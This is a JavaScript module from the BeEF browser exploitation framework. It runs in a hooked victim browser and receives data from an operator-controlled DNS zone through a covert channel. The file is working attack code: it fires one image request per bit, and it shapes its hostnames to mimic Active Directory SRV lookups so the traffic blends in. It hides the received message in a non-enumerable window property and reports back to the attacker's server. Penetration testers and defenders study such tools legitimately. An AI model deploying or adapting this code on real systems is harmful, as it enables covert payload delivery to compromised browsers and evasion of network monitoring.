Path: blob/master/modules/ipec/s2c_dns_tunnel/command.js
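//
// Copyright (c) 2006-2026 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

/*
This JavaScript retrieves data from a server via a DNS covert channel.

A remote controlled domain with a custom DNS server implementing the covert channel logic is required.
BeEF supports this feature via the Server-to-Client DNS Tunnel extension.

How a message is read (one DNS name per bit):
- For every bit of every byte, a unique hostname under the tunnel zone is built and requested
  as an image. The authoritative DNS server for the zone decides, from the message and bit
  numbers encoded in the name, whether the name resolves (the image loads -> bit 1) or
  fails (the image errors -> bit 0).
- A byte of 0x00 (all eight requests failed) terminates the message.

Caveats for operators:
- Any DNS or HTTP failure unrelated to the channel (resolver timeout, blocked egress, a
  proxy or captive portal that answers with a non-image page) is indistinguishable from a
  0 bit; a whole byte of such failures reads as the terminator and silently truncates the
  message. The reported bps value does not reveal this.
- The hostnames carry the command id and the zone in clear text to every resolver and
  proxy on the path; the channel is covert, not confidential.
- The values interpolated below are rendered server side by ERB into JS string literals and
  are not escaped; they are expected to be operator controlled, never hooked-browser
  controlled.

The initial concept of the DNS covert channel and its implementation are described in the following literature:
- K. Born. Browser-Based Covert Data Exfiltration. http://arxiv.org/ftp/arxiv/papers/1004/1004.4357.pdf
- W. Alcorn, C. Frichot, M. Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091

*/
beef.execute(function() {

  var payload_name = "<%= @payload_name %>";
  var domain = "<%= @zone %>";
  var scheme = beef.net.httpproto;
  var port = beef.net.port;
  var cid = "<%= @command_id %>";
  var curl = "<%= @command_url %>";

  // Per-message state, indexed by message number.
  var messages = [];        // text reconstructed so far
  var bits = [];            // bits[msg][absolute bit index] = 0 | 1
  var bit_transfered = [];  // bit_transfered[msg][byte] = answered requests for that byte (0..8)
  var timing = [];          // start timestamp (ms) per message, for the bps report

  // Port suffix for the image URL, omitted only for the default HTTP port.
  // beef.net.port may be a string or a number depending on how it was set, so compare as a string.
  var fport = String(port) === "80" ? "" : ":" + port;

  // Do the DNS query by requesting an image. A successful load means the tunnel DNS server
  // answered for this name (bit = 1); any error (NXDOMAIN, unreachable host, non-image
  // response) is read as bit = 0.
  // Declared as a local function (the original leaked it as an implicit global).
  function send_query(fqdn, msg, byte, bit) {
    var img = new Image();

    // Record one answered bit; once all eight bits of the byte are in, decode it.
    var record = function(value) {
      bits[msg][bit] = value;
      bit_transfered[msg][byte]++;
      if (bit_transfered[msg][byte] >= 8) reconstruct_byte(msg, byte);
    };

    // Attach the handlers before assigning src so an immediately-fired (cached) load
    // or error event cannot be missed.
    img.onload = function() { record(1); };
    img.onerror = function() { record(0); };

    img.src = scheme + "://" + fqdn + fport + "/tiles/map";
  }

  // Construct DNS names following the Active Directory SRV resource record pattern
  // (_ldap._tcp.<label>.domains._msdcs.<zone>) so the queries resemble ordinary AD
  // lookups, and resolve them via send_query. One query per bit.
  // See http://technet.microsoft.com/en-us/library/cc961719.aspx
  function get_byte(msg, byte) {
    bit_transfered[msg][byte] = 0;
    // Random labels make every name unique, defeating DNS and HTTP caches. They carry no
    // secret, so Math.random() is adequate here.
    var rnd8 = getRandomStr(8);
    var rnd12 = getRandomStr(12);
    // Message number in hex, capped at 8 hex digits (same for the bit number below).
    var msg_str = ("" + msg.toString(16)).substr(-8);
    // Request the byte one bit at a time; all eight requests are in flight concurrently.
    for (var bit = byte * 8; bit < (byte * 8) + 8; bit++) {
      var bit_str = ("" + bit.toString(16)).substr(-8);
      var subdomain = "_ldap._tcp." + rnd8 + "-" + msg_str + "-" + cid + "-" + bit_str + "-" + rnd12;
      // Deliberately a local: the original assigned the implicit global `name`, i.e.
      // window.name, which persists across navigations (including cross-origin ones)
      // and would leak the tunnel hostname and command id to later pages.
      var fqdn = subdomain + '.domains._msdcs.' + domain;
      send_query(fqdn, msg, byte, bit);
    }
  }

  // Construct a random alphanumeric string of exactly n characters (n clamped to 1..12).
  // Math.random().toString(36) yields a variable number of digits, so keep drawing until
  // the requested length is reached instead of occasionally returning a shorter label.
  function getRandomStr(n) {
    var len = Math.max(1, Math.min(n, 12));
    var out = "";
    while (out.length < len) {
      out += Math.random().toString(36).slice(2);
    }
    return out.slice(0, len);
  }

  // Initialise the per-message state and request the first byte.
  function get_message(msg) {
    messages[msg] = "";
    bits[msg] = [];
    bit_transfered[msg] = [];
    timing[msg] = (new Date()).getTime();
    get_byte(msg, 0);
  }

  // Assemble the byte from its eight bits (MSB first). A non-zero byte is appended and the
  // next byte requested; a zero byte terminates the message, which is then published on
  // window[payload_name] and its throughput reported back to BeEF.
  function reconstruct_byte(msg, byte) {
    var code = 0;
    for (var bit = byte * 8; bit < (byte * 8) + 8; bit++) {
      code = (code << 1) | bits[msg][bit];
    }

    if (code !== 0) {
      // Not terminated yet: keep the character and fetch the next byte.
      messages[msg] += String.fromCharCode(code);
      get_byte(msg, byte + 1);
      return;
    }

    // Terminated. Throughput in bits per second (terminator byte included); clamp the
    // elapsed time so a sub-millisecond transfer does not report Infinity.
    var delta = ((new Date()).getTime() - timing[msg]) / 1000;
    if (delta <= 0) delta = 0.001;
    var bytes_per_second = "" + ((messages[msg].length + 1) * 8) / delta;

    // Save the message in the window under the payload name. A newly created property is
    // made non-enumerable to keep it out of casual for-in inspection. NOTE(review): if
    // payload_name collides with a non-writable window property the assignment silently
    // does nothing in sloppy mode - choose payload names that cannot clash.
    if (Object.prototype.hasOwnProperty.call(window, payload_name)) {
      window[payload_name] = messages[msg];
    } else {
      Object.defineProperty(window, payload_name, {
        value: messages[msg],
        writable: true,
        enumerable: false
      });
    }

    beef.net.send(curl, parseInt(cid, 10), 's2c_dns_tunnel=true' + '&bps=' + bytes_per_second);
  }

  get_message(0);
});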